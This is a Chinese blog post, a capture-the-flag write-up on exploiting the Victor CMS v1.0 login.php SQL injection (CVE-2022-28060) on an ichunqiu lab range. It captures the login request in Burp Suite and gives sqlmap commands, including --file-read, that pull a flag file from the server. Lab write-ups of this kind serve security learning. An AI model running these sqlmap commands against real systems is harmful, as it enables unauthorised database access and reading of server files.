春秋云境:CVE-2022-28060(SQL注入)

最新推荐文章于 2024-05-13 10:38:31 发布
最新推荐文章于 2024-05-13 10:38:31 发布
阅读量886 收藏
点赞数 1
分类专栏: i春秋 文章标签: php 开发语言 sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65712192/article/details/130256896
版权
文章介绍了VictorCMSv1.0的login.php存在SQL注入漏洞,通过BurpSuite抓包,使用sqlmap尝试自动化检测和利用。在Windows环境下遇到问题,转而在KaliLinux上运行sqlmap,成功读取到服务器上的flag文件,获取了flag信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一、题目

二、bp抓包跑sqlmap

一、题目

介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

进入靶场:

 官方给出的应该是登录界面

admin登录看看 是空白页面 不过看包头应该是POST方式:

二、bp抓包跑sqlmap

  burp抓包:

存文件 给sqlmap梭哈:

python sqlmap.py -l icq.txt --batch -dbs

这样好像对这个靶场漏洞不起作用:

一直卡住。。。

csdn求大佬吧:

python sqlmap.py -r xxx.txt --file-read "/flag" --dbms mysql --batch

       file-read: SQLmap --file-read从服务器中读取文件
       当用户权限足够大并且具有特定的函数,即可读取服务器中的文件,可以是文本,也可以是二进制文件
        dbms mysql 指定数据库类型

由于win的sqlmap跑不出来,我也不知道为啥。。。 

kali的sqlmap跑一下:

 跑出来生成到kali的sqlmap目录下:

 cat 查看一下:

 cat /root/.local/share/sqlmap/output/xxx.ichunqiu.com/files/_flag

 得出来flag{b0015c11-4c39-42ce-8749-fdc15330fd4d}  

【漏洞复现】Django SQL注入漏洞 (CVE-2022-28346)
李火火的安全圈
01-01 5369
Django是用Python开发的一个免费开源的Web结构,几乎包括了Web使用方方面面,能够用于快速建立高性能、文雅的网站,Diango提供了许多网站后台开发常常用到的模块,使开发者可以专注于业务部分。攻击者使用精心编制的字典,通过 **kwargs 传递给QuerySet.annotate()、aggregate()和extra()这些方法,可导致这些方法在列别名中受到SQL注入攻击,该漏洞在2.2.28之前的Django 2.2、3.2.13之前的3.2和4.0.4之前的4.0中都存在这个问题。
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 771
春秋CVE-2022-32991 Web Based Quiz System SQL注入
春秋CVE-2022-28060
m0_64432806的博客
03-20 282
春秋CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入
春秋CVE-2022-28060
一只爱吃橙子的羊
11-29 2664
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋CVE-2022-28060
ZXW_NUDT的博客
02-22 2910
春秋CVE-2022-28060
[春秋镜] CVE-2022-28060 详细讲解
weixin_60374959的博客
11-28 3617
Victor CMS v1.0 /includes/login.php 存在sql注入
CVE-2022-28060 i春秋
biejianghua的博客
11-28 1062
i春秋CVE-2022-28060
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1174
春秋.com】CVE-2022-32991思路
春秋镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2715
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
春秋镜】CVE-2023-43291 反序列化字符串逃逸+sql注入
最新发布
2401_84968060的博客
05-13 260
重点包括三个包,发表文章注入payload,反序列化写入缓存,大佬文章写到了读取数据库表列的信息,我就直接到最后读取flag了。前面都没问题,后面读取flag的时候发现报错:上网搜了一下错误,发现是编码不一致导致的:然后修改payload,再次发包访问发现成功读取flag。
CVE-2022-28060
龙狼刺的博客
06-11 383
Victor CMS v1.0 /includes/login.php 存在sql注入
[春秋镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
qq_49199168的博客
10-30 2447
[春秋镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
CVE-2022-28060(Victor CMS v1.0 )
qq_45092459的博客
11-27 1386
存在问题本:Victor CMS v1.0 看到页面简单,然后旁边有一个登陆框,尝试登陆框哪里进行套路尝试(弱口令万能和注入),见过注入有戏,吧他拿到sqlmp跑一下。 然后找到flag。
春秋CVE-2022-28060
qq_22002773的博客
07-02 342
春秋CVE-2022-28060
CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入
qq_38733240的博客
06-03 443
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋:CVE-2022-32991(SQL注入
m0_65712192的博客
04-12 2186
该CMS的welcome.php中存在SQL注入攻击。
春秋CVE-2022-29464
07-28
- *1* [【春秋CVE-2022-29464](https://blog.youkuaiyun.com/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值